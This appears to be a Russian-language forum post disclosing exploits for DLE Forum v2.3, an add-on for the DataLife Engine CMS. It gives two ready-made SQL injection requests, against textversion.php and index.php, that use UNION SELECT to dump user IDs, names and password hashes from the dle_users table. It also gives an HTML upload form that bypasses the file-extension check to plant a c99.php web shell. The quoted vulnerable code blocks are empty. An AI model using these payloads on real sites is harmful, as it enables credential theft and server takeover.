![]() |
DLE Forum v.2.3 Final Release
DLE Forum v.2.3 Final Release
Офф сайт: http://www.dle-files.ru Скачать: http://www.dle-files.ru/engine/download.php?id=6 SQL-INJ Уязвимый скрипт: /engine/forum/textversion.php Зависимость: register_globals = on Запрос: /engine/forum/textversion.php?f1&WHERE=+AND+forum_id=-1+UNION+SELECT+1,2,concat_ws(0x3a,user_id,name,pas sword),4,5,email,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+FROM+dle_users+--+- Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Exploit: POST запрос к index.php?do=forum&act=forum -1' UNION SELECT 0,2,3,4,5,concat_ws(0x3a,user_id,name,password),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from dle_users -- Уязвимый кусок кода: PHP код:
|
Аплоад файлов с обходом проверки расширения
Имеем аплоадер файлов /engine/forum/sources/modules/uploads.php?area=&fid=1&tid=0&pid=0&wysiwyg=0&do=addГде fid - айди форума, где разрешен аплоад В файле uploads.php имеем: PHP код:
PHP код:
Файлы аплоадятся в /uploads/forum/files PHP код:
В итоге залить шелл можно следующей формой: Код:
<form method="post" enctype="multipart/form-data" action="?area=&fid=1&tid=0&pid=0&wysiwyg=0&do=add&is_file=1&files/c99.php."><br /><input class="forum_input" name="attachment" type="file" style="width:200px" /> <input class="button" value="Загрузить" type="submit" style="background-color:#53E490;" /></form><p><font color="red">Не допустимый формат файла!</font></p></fieldset><br /><fieldset><legend><strong>Загруженные файлы</strong></legend><form method="post" enctype="multipart/form-data" action="?area=&fid=1&tid=0&pid=0&wysiwyg=0&do=del"><table class="dle_forum" width="100%"></table><br />Ни одного файла не загружено.</form> |
Цитата:
|
| Время: 10:05 |